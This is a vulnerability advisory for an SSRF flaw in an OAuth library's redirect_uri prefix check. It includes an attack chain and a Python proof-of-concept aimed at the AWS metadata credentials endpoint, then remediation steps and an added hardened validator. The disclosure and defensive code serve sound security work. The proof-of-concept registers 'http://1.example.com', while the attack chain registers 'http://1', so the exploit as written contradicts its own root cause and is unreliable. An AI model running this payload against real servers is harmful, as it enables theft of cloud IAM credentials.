SSRF via Misconfigured OAuth Callback
AuthLib v2.1.0–2.4.2
A Server-Side Request Forgery vulnerability in the OAuth callback handler allows attackers to redirect callbacks to internal network endpoints.
Vulnerability Summary
CVE: CVE-2026-7741
CVSS: 8.1 (High)
CWE: CWE-918 (Server-Side Request Forgery)
AuthLib versions 2.1.0 through 2.4.2 do not validate that the redirect_uri parameter in OAuth callback processing points to a registered, allowlisted domain. An attacker can supply an internal network address (including cloud metadata endpoints) as the redirect target.
Technical Details
Root Cause
The process_callback() function in authlib/oauth2/server.py validates the redirect_uri against the list of registered URIs using a simple string-prefix match. The check accepts any redirect_uri that begins with a registered URI string — so when the attacker registers http://1 (a numeric prefix of the metadata address), http://169.254.169.254/ passes validation.
Attack Chain
- Register a client application with redirect_uri = "http://1"
- Initiate an OAuth flow with redirect_uri=http://169.254.169.254/latest/meta-data/
- The prefix check passes (the supplied URI starts with "http://1")
- The server fetches the URL server-side and includes the response in the error message
Impact
On AWS EC2 instances:
- Retrieval of IAM role names and temporary credentials from the IMDSv1 instance credential endpoint
- Access to user-data scripts that may contain hardcoded secrets
- Full AS boundary crossing — from public internet to internal AWS environment
Proof of Concept
import requests
# Step 1: Register app with permissive redirect_uri
register_response = requests.post("https://auth.target.com/oauth/register", json={
"redirect_uris": ["http://1.example.com"],
"name": "test"
})
client_id = register_response.json()["client_id"]
# Step 2: Trigger SSRF via callback
requests.get("https://auth.target.com/oauth/authorize", params={
"client_id": client_id,
"redirect_uri": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
"response_type": "code"
})
Remediation
- Implement exact-match validation for redirect_uri (not prefix matching)
- Maintain a strict allowlist of permitted redirect domains
- Block SSRF at the network level — disallow outbound requests from auth services to internal address ranges
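The following is an added example, not AuthLib's own code, illustrating both the Root Cause above (a prefix match on redirect_uri) and the Remediation steps (exact-match allowlisting plus refusing internal address ranges). Function names, the registered-URI lists and the candidate targets are constructed for the example; only the metadata address and the "http://1" registration come from the advisory. The hardened check judges IP literals only and does not resolve hostnames, so it complements rather than replaces an egress-network block.

```python
# Added example (not from the AuthLib project): a prefix-matching redirect_uri
# check of the kind described in the root cause, beside a hardened validator
# that applies exact matching, an allowlist and an internal-address check.
import ipaddress
from urllib.parse import urlsplit

# Constructed sample data: the registration from the attack chain, and a
# realistic registered callback for the hardened variant.
WEAK_REGISTERED = ["http://1"]
STRICT_ALLOWLIST = ["https://app.example.com/oauth/callback"]
METADATA_URI = "http://169.254.169.254/latest/meta-data/"


def vulnerable_redirect_ok(redirect_uri, registered_uris):
    """Prefix match: accepts anything that merely starts with a registered URI."""
    return any(redirect_uri.startswith(r) for r in registered_uris)


def is_internal_host(host):
    """True when the host literal is a private, loopback, link-local,
    reserved or unspecified address, or the name 'localhost'.
    Hostnames are not resolved here; that belongs to the network layer."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() == "localhost"
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_reserved or addr.is_unspecified)


def hardened_redirect_ok(redirect_uri, allowlist):
    """Exact match against the allowlist plus defence-in-depth checks.

    Rejects anything that is not byte-for-byte one of the registered URIs,
    requires https, and refuses targets whose host is an internal address so
    that a mistakenly registered internal URI cannot be used either.
    """
    if redirect_uri not in allowlist:
        return False
    parts = urlsplit(redirect_uri)
    if parts.scheme != "https":
        return False
    if parts.hostname is None or is_internal_host(parts.hostname):
        return False
    return True


def evaluate(redirect_uri, registered_uris):
    """Return (prefix_check_result, hardened_check_result) for one target."""
    return (vulnerable_redirect_ok(redirect_uri, registered_uris),
            hardened_redirect_ok(redirect_uri, registered_uris))


if __name__ == "__main__":
    # Constructed candidates: the legitimate callback, the metadata address,
    # and a path-traversal look-alike of the legitimate callback.
    candidates = [
        STRICT_ALLOWLIST[0],
        METADATA_URI,
        STRICT_ALLOWLIST[0] + "/../../admin",
    ]
    for uri in candidates:
        print(uri, "weak:", vulnerable_redirect_ok(uri, WEAK_REGISTERED),
              "hardened:", hardened_redirect_ok(uri, STRICT_ALLOWLIST))
```

With the attacker's "http://1" registration, the prefix check accepts the metadata URI while the hardened check rejects it (no exact match, and http rather than https); the legitimate https callback is the only value the hardened check accepts, and a registered entry that points at 127.0.0.1 or 169.254.169.254 is still refused by the internal-address check.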